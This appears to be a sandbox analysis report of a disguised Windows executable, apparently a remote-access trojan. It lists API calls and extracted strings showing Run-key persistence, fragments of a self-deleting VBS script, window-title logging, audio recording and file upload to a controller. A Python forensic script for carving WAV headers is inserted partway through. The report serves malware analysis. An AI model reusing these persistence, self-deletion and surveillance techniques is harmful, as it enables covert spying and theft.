                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                            • ExitProcess.KERNEL32 ref: 0040C287
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                            • API String ID: 3797177996-1998216422
                            • Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                            • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                            • Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                            • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                            • SetEvent.KERNEL32 ref: 0041A39A
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                            • CloseHandle.KERNEL32 ref: 0041A3BB
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                            • API String ID: 738084811-1408154895
                            • Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                            • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                            • Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                            • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            • API String ID: 1602526932-4212202414
                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
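The thirteen WriteFile calls above, with sizes 4,4,4,4,4,2,2,4,4,2,2,4,4 and the literals RIFF, WAVE, "fmt " and data, are the canonical 44-byte PCM RIFF/WAVE header, so the function is writing out a recording. The Python below is an added example, not Remcos code: it builds a header in exactly that field order, parses one back with consistency checks, and carves plausible headers out of a byte blob such as a process dump. The field names beyond the four tags (format tag, channels, sample rate, byte rate, block align, bits per sample) are the standard layout assumed here; the listing only shows the sizes and pointers (00471B02, 00471B04, 00471B0E), not the values the sample used, so the channel count, rate and bit depth in the example are constructed.

```python
"""Build, validate and carve the 44-byte PCM RIFF/WAVE header whose field
order and sizes match the WriteFile sequence above. Added example; not Remcos code."""
import struct


def build_pcm_wav_header(channels, sample_rate, bits_per_sample, data_len):
    """Emit the header as the same thirteen fields the listing writes:
    RIFF, riff size, WAVE, 'fmt ', fmt size, format tag, channels, sample rate,
    byte rate, block align, bits per sample, 'data', data size (all little-endian)."""
    block_align = channels * bits_per_sample // 8
    byte_rate = sample_rate * block_align
    return (b"RIFF" + struct.pack("<I", 36 + data_len) + b"WAVE"
            + b"fmt " + struct.pack("<I", 16)
            + struct.pack("<HHIIHH", 1, channels, sample_rate, byte_rate,
                          block_align, bits_per_sample)
            + b"data" + struct.pack("<I", data_len))


def parse_wav_header(buf):
    """Return the header fields as a dict, or None if buf does not start with a
    well-formed 16-byte-fmt PCM header. Beyond the four tags it checks the
    arithmetic (block align, byte rate), so a stray 'RIFF' in a dump is rejected."""
    if (len(buf) < 44 or buf[:4] != b"RIFF" or buf[8:12] != b"WAVE"
            or buf[12:16] != b"fmt " or buf[36:40] != b"data"):
        return None
    riff_size = struct.unpack_from("<I", buf, 4)[0]
    fmt_size = struct.unpack_from("<I", buf, 16)[0]
    tag, ch, rate, byte_rate, align, bits = struct.unpack_from("<HHIIHH", buf, 20)
    data_len = struct.unpack_from("<I", buf, 40)[0]
    if (fmt_size != 16 or tag != 1 or ch == 0 or bits % 8
            or align != ch * bits // 8 or byte_rate != rate * align):
        return None
    return {"channels": ch, "sample_rate": rate, "bits_per_sample": bits,
            "data_len": data_len, "riff_size": riff_size}


def carve_wav_headers(blob):
    """Return [(offset, fields)] for every plausible PCM WAV header in blob,
    e.g. a memory dump or the unallocated space of a disk image."""
    hits = []
    pos = blob.find(b"RIFF")
    while pos != -1:
        fields = parse_wav_header(blob[pos:pos + 44])
        if fields is not None:
            hits.append((pos, fields))
        pos = blob.find(b"RIFF", pos + 1)
    return hits


if __name__ == "__main__":
    # Constructed blob: junk, a mono 8 kHz 16-bit header plus 1600 bytes of
    # samples, then a decoy 'RIFF....WAVE' with a broken fmt chunk.
    hdr = build_pcm_wav_header(1, 8000, 16, 1600)
    blob = b"\x90" * 37 + hdr + b"\x00" * 1600 + b"RIFFxxxxWAVEjunk" + b"\xcc" * 40
    for off, fields in carve_wav_headers(blob):
        print(hex(off), fields)
```

When carving a real dump, a header whose riff_size disagrees with 36 + data_len is still worth keeping: a recorder that writes the header before the audio and patches the sizes on close will leave inconsistent values if the process was killed mid-capture.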
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000001,004068B2,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                            • API String ID: 1646373207-3129417747
                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                            APIs
                            • _wcslen.LIBCMT ref: 0040BC75
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                            • _wcslen.LIBCMT ref: 0040BD54
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000000,00000000), ref: 0040BDF2
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                            • _wcslen.LIBCMT ref: 0040BE34
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                            • ExitProcess.KERNEL32 ref: 0040BED0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                            • String ID: 6$C:\Users\user\Desktop\RFQ-20241230.pif.exe$del$open$BG$BG
                            • API String ID: 1579085052-3434148781
                            • Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                            • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                            • Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                            • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 0041B1E6
                            • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                            • lstrlenW.KERNEL32(?), ref: 0041B217
                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                            • _wcslen.LIBCMT ref: 0041B2EB
                            • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                            • GetLastError.KERNEL32 ref: 0041B323
                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                            • lstrcatW.KERNEL32(?,?), ref: 0041B369
                            • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                            • GetLastError.KERNEL32 ref: 0041B380
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                            • String ID: ?
                            • API String ID: 3941738427-1684325040
                            • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                            • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                            • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                            • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$EnvironmentVariable$_wcschr
                            • String ID:
                            • API String ID: 3899193279-0
                            • Opcode ID: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
                            • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                            • Opcode Fuzzy Hash: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
                            • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                            • Sleep.KERNEL32(00000064), ref: 00412060
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$HDG$HDG$>G$>G
                            • API String ID: 1223786279-3931108886
                            • Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                            • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                            • Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                            • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                            • API String ID: 2490988753-744132762
                            • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                            • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                            • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                            • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                            • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            • API String ID: 1332880857-3714951968
                            • Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                            • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                            • Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                            • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040A456
                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                            • GetForegroundWindow.USER32 ref: 0040A467
                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                            • API String ID: 911427763-1497357211
                            • Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                            • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                            • Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                            • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                            • GetCursorPos.USER32(?), ref: 0041CB08
                            • SetForegroundWindow.USER32(?), ref: 0041CB11
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                            • ExitProcess.KERNEL32 ref: 0041CB84
                            • CreatePopupMenu.USER32 ref: 0041CB8A
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            • API String ID: 1657328048-3535843008
                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                            • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                            • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$Info
                            • String ID:
                            • API String ID: 2509303402-0
                            • Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                            • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                            • Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                            • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                            • __aulldiv.LIBCMT ref: 00407FE9
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                            • API String ID: 1884690901-3066803209
                            • Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                            • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                            • Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                            • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                            APIs
                            • Sleep.KERNEL32(00001388), ref: 00409E62
                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                            • API String ID: 3795512280-3163867910
                            • Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                            • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                            • Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                            • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 004500C1
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                            • _free.LIBCMT ref: 004500B6
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 004500D8
                            • _free.LIBCMT ref: 004500ED
                            • _free.LIBCMT ref: 004500F8
                            • _free.LIBCMT ref: 0045011A
                            • _free.LIBCMT ref: 0045012D
                            • _free.LIBCMT ref: 0045013B
                            • _free.LIBCMT ref: 00450146
                            • _free.LIBCMT ref: 0045017E
